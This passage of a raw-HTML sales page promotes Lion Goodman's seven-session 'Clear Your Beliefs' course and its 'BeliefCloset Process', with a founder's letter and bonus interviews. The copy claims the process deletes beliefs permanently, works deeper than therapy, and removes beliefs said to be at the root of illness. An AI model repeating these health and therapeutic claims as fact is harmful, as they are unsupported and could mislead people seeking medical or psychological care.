happen.</em></strong></em></strong>\r\n\r\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\r\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\r\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\r\n<p>&nbsp;</p>\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p>The same thing is true in your subconscious mind:</p>\r\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\r\n<p><strong>It''s that simple.</strong></p>\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n\r\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\r\n\r\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\r\n\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n\r\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\r\n\r\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\r\n\r\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\r\n\r\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\r\n\r\n<p><strong> It''s that simple.</strong></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\n\r\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\r\n\r\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\r\n\r\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\r\n\r\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Why We React The Way We Do</h1>\r\n\r\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\r\n\r\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\r\n\r\n<p>\r\n</p>\r\nWhy did I say that?\r\nWhat''s wrong with me?\r\nWhy didn''t I follow through?\r\nWhy did I react that way?\r\nWhat the hell just happened?\r\n\r\n<p><em></p>\r\n\r\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\r\n\r\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\r\n\r\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n\r\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\r\n\r\n<p><strong>Here''s why:</strong></p>\r\n\r\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\r\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\r\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\r\n\r\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Here''s Some Good News</h1>\r\n\r\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\r\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\r\n\r\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\r\n\r\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\r\n\r\n<h1>Imagine The Life You Desire</h1>\r\n\r\n<p><strong>Can you imagine this?</strong></p>\r\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\r\n<p>You''re no longer held back by old beliefs and stories.</p>\r\n<p>There''s no resistance to doing what needs to be done.</p>\r\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\r\n<p>&nbsp;</p>\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n\r\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\r\n\r\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\r\n\r\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\r\n\r\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\r\n<p>&nbsp;</p>\r\n<h1>Clear Whatever Is In The Way</h1>\r\n\r\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\r\n\r\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\r\n\r\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\r\n\r\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n\r\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\r\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\r\nGive you the power to change your experiences – and your circumstances – at will.\r\nShow you how to gain mastery over your moods, perceptions, and responses.\r\n\r\n<p>&nbsp;</p>\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\r\n\r\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\r\n\r\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\r\n\r\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\r\n\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n\r\n<p>\r\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\r\nRemove resistance and barriers\r\nOpen doors to new opportunities\r\nEliminate pain and suffering from the past\r\nExperience more fulfillment in your relationships\r\nAttract more abundance and prosperity\r\nIncrease your energy, vitality, and productivity\r\n\r\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<h1>A Message from Lion Goodman...</h1>\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\r\n<p>Dear Explorer:</p>\r\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\r\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\r\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\r\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\r\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\r\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\r\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\r\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\r\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\r\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\r\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\r\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\r\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\r\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\r\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\r\n<p>In gratitude, and with warm wishes for your total success,</p>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\r\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Register Today and Discover What''s Possible</h1>\r\n\r\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\r\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\r\n\r\n<p><strong> In Session 1, you will:</strong></p>\r\n\r\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\r\nLearn which ones keep you stuck, preventing you from having what you want in life\r\nExperience a process that returns you to your True Self, the home of inner joy and bliss\r\nBegin to work with, not against, your subconscious mind – where your beliefs reside\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\r\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\r\n\r\n<p><strong> In Session 2, you will:</strong></p>\r\n\r\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\r\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\r\nSee your own magnificence through a new clear lens of your own beauty and joy\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\r\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\r\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\r\n\r\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\r\n\r\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\r\n\r\n<p><strong> In Session 3, you will:</strong></p>\r\n\r\nIdentify old beliefs that stand between you and creating the life you want\r\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\r\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\r\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\r\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<p><strong> In Session 4, you will:</strong></p>\r\n\r\nLook deeply into the childhood patterns that enabled you to survive and thrive\r\nSee which of your beliefs now interfere with your intimate relationships\r\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\r\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\r\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\r\n\r\n<p><strong> In Session 5, you will:</strong></p>\r\n\r\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\r\nRemove beliefs that create stumbling blocks in the way of natural abundance\r\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\r\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\r\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\r\n\r\n<p><strong> In Session 6, you will:</strong></p>\r\n\r\nIdentify old beliefs that stand between you and vibrant health\r\nRecognize beliefs that make you vulnerable to disease and injury\r\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\r\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\r\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\r\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\r\n\r\n<p><strong> In Session 7, you will:</strong></p>\r\n\r\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\r\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\r\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\r\n\r\n<p></p>\r\n<p>&nbsp;</p>\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\r\n<p>&nbsp;</p>\r\n\r\nBonus #1:  <strong>Love:  What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\r\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\r\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\r\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\nBonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong>\r\n\r\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\r\n\r\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the 